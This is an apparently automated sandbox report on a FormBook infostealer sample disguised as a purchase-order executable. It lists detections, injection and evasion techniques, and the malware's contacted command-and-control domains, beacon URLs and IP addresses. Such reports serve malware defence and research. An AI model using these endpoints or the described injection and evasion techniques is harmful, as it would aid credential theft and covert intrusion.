          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383978 Sample: PO-RFQ # 097663899.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.xiaoqiche.net 2->31 33 www.almosting.com 2->33 35 alrighting.xshoppy.shop 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 6 other signatures 2->49 11 PO-RFQ # 097663899.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\PO-RFQ # 097663899.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 PO-RFQ # 097663899.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.farmacyfastfood.com 212.237.249.116, 49728, 80 ZITCOMDK Denmark 18->37 39 kopebitest.com 103.253.212.249, 49724, 80 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 systray.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO-RFQ # 097663899.exe30%VirustotalBrowse
          PO-RFQ # 097663899.exe27%ReversingLabsWin32.Trojan.Woreflint
          PO-RFQ # 097663899.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.PO-RFQ # 097663899.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.agarkovsport.online/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc50%Avira URL Cloudsafe
          www.aquaroyaume.com/uabu/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.salesenablementlaunch.com/uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.mayipay9.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.globalperfumery.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY130%Avira URL Cloudsafe
          http://www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.aquaroyaume.com/uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.oldschoolnews.net/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          alrighting.xshoppy.shop
          75.2.113.213
          truefalse
            unknown
            www.farmacyfastfood.com
            212.237.249.116
            truetrue
              unknown
              bigbuddyco.com
              160.153.136.3
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.218
                truefalse
                  high
                  www.aquaroyaume.com
                  185.107.56.197
                  truetrue
                    unknown
                    www.agarkovsport.online
                    209.99.40.222
                    truetrue
                      unknown
                      salesenablementlaunch.com
                      34.102.136.180
                      truefalse
                        unknown
                        www.globalperfumery.com
                        94.136.40.51
                        truetrue
                          unknown
                          kopebitest.com
                          103.253.212.249
                          truetrue
                            unknown
                            mayipay9.com
                            34.102.136.180
                            truefalse
                              unknown
                              www.kopebitest.com
                              unknown
                              unknowntrue
                                unknown
                                www.almosting.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.mayipay9.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.ahaal20.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.oldschoolnews.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.qingniang.club
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.xiaoqiche.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.salesenablementlaunch.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.lattakia-imbiss.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.bigbuddyco.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktutrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.agarkovsport.online/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  www.aquaroyaume.com/uabu/true
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.salesenablementlaunch.com/uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0utfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.mayipay9.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEYfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.globalperfumery.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0uttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.aquaroyaume.com/uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0uttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.oldschoolnews.net/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiytrue
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersGPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bThePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers?PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://www.gnu.org/licenses/PO-RFQ # 097663899.exefalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.tiro.comexplorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.goodfont.co.krPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.carterandcone.comlPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sajatypeworks.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.typography.netDPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cThePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://fontfabrik.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.galapagosdesign.com/DPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.gnu.orgPO-RFQ # 097663899.exefalse
                                                                          high
                                                                          http://www.fontbureau.com/designers8PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmp, PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                198.54.117.218
                                                                                parkingpage.namecheap.comUnited States
                                                                                22612NAMECHEAP-NETUSfalse
                                                                                209.99.40.222
                                                                                www.agarkovsport.onlineUnited States
                                                                                40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                185.107.56.197
                                                                                www.aquaroyaume.comNetherlands
                                                                                43350NFORCENLtrue
                                                                                212.237.249.116
                                                                                www.farmacyfastfood.comDenmark
                                                                                48854ZITCOMDKtrue
                                                                                160.153.136.3
                                                                                bigbuddyco.comUnited States
                                                                                21501GODADDY-AMSDEtrue
                                                                                34.102.136.180
                                                                                salesenablementlaunch.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                103.253.212.249
                                                                                kopebitest.comIndonesia
                                                                                58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue
                                                                                94.136.40.51
                                                                                www.globalperfumery.comUnited Kingdom
                                                                                20738GD-EMEA-DC-LD5GBtrue

                                                                                General Information

                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                Analysis ID:383978
                                                                                Start date:08.04.2021
                                                                                Start time:13:31:42
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 10m 55s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Sample file name:PO-RFQ # 097663899.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:29
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:1
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@7/1@14/8
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 9.9% (good quality ratio 8.9%)
                                                                                • Quality average: 71.9%
                                                                                • Quality standard deviation: 31.4%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 86
                                                                                • Number of non-executed functions: 145
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 40.88.32.150, 52.147.198.201, 168.61.161.212, 23.54.113.53, 13.64.90.137, 52.255.188.83, 95.100.54.203, 20.82.210.154, 23.10.249.26, 23.10.249.43, 23.0.174.200, 23.0.174.185, 20.54.26.129
                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                13:32:39API Interceptor1x Sleep call for process: PO-RFQ # 097663899.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                198.54.117.218Betaling_advies.exeGet hashmaliciousBrowse
                                                                                • www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • www.enerav.com/c22b/?t8bHuTK=aEhNz1M5MwONSiBn/0vn4w/gCXHJ6jEF3X3HXryAuETgC+Myn95z7x6eSB6DSHN4Cngq&2d=lnvt
                                                                                46578-TR.exeGet hashmaliciousBrowse
                                                                                • www.kevinrsamuels.network/goei/?kfOdRJ=f9uvcKoleaXhAa+Mtcg3NtpkL3OawIA7ZGyED81dVKF6dE9d54Zy+1duc26jKxOfhZ46&jBZx=D8b4q
                                                                                SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
